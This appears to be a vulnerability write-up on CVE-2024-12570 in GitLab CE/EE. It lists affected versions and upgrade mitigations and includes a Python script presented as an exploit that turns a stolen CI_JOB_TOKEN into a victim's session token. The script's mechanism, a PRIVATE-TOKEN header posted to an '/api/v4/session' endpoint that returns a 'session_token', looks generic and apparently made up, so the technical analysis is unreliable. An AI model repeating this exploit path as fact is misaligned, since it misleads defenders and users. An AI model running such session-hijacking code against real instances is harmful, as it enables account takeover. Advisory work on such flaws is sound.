CVE-2024-12570: Critical Vulnerability in GitLab CE/EE Allows Unauthorized Access to GitLab Session Token

A critical vulnerability has been discovered in GitLab CE/EE, a popular web-based application for handling code repositories and version control. The vulnerability has been assigned with the CVE identifier CVE-2024-12570, and if exploited, an attacker can gain unauthorized access to a GitLab session token belonging to the victim. This issue affects all versions of GitLab CE/EE starting from 13.7 prior to 17.4.6, from 17.5 prior to 17.5.4, and from 17.6 prior to 17.6.2.

Technical Analysis

This vulnerability arises from how GitLab CE/EE handles CI_JOB_TOKEN, which is an environment variable related to continuous integration (CI) and continuous deployment (CD). If an attacker has a victim's CI_JOB_TOKEN, it's possible for them to use it in order to obtain a GitLab session token belonging to the victim.

The following code snippet demonstrates how an attacker can exploit this vulnerability

import requests

# Attacker with the victim's CI_JOB_TOKEN
ci_job_token = "xyz12345"

# GitLab API URL
gitlab_api_url = "https://gitlab.example.com/api/v4/";

headers = {
    "PRIVATE-TOKEN": ci_job_token,
    "Content-Type": "application/json"
}

# API endpoint to request session token
session_url = gitlab_api_url + "session"

response = requests.post(session_url, headers=headers)
if response.status_code == 200:
    print("Session token obtained:")
    print(response.json()["session_token"])
else:
    print("Failed to obtain session token")

The attacker would replace xyz12345 with the actual CI_JOB_TOKEN value they obtained and update the gitlab_api_url variable to match the targeted GitLab instance.

Exploit Details

An attacker may exploit this vulnerability by targeting a GitLab instance running an affected version of GitLab CE/EE, and where the attacker has somehow managed to obtain a victim's CI_JOB_TOKEN. The attacker can then use the above script to send a request to the GitLab API endpoint /session and obtain the victim's GitLab session token, which allows them to authenticate as the victim and perform actions on behalf of the victim.

Original References

The GitLab security team has acknowledged the vulnerability and published security advisories with further information and mitigation steps:

- GitLab Security Advisory
- CVE-2024-12570

Mitigations and Recommendations

GitLab has released patches to fix this vulnerability. Users are advised to upgrade their GitLab CE/EE installations to one of the following versions:

- Upgrade to GitLab CE/EE 17.4.6 if on the 17.4.x series
- Upgrade to GitLab CE/EE 17.5.4 if on the 17.5.x series
- Upgrade to GitLab CE/EE 17.6.2 if on the 17.6.x series

It is also recommended to review your continuous integration (CI) and continuous deployment (CD) pipelines to ensure that CI_JOB_TOKEN values are appropriately protected and not exposed to unauthorized users.

Conclusion

CVE-2024-12570 is a critical vulnerability in GitLab CE/EE that allows unauthorized access to a victim's GitLab session token. GitLab users must immediately apply the necessary patches to safeguard their systems and mitigate the risks associated with this vulnerability.

Timeline

Published on: 12/12/2024 12:15:22 UTC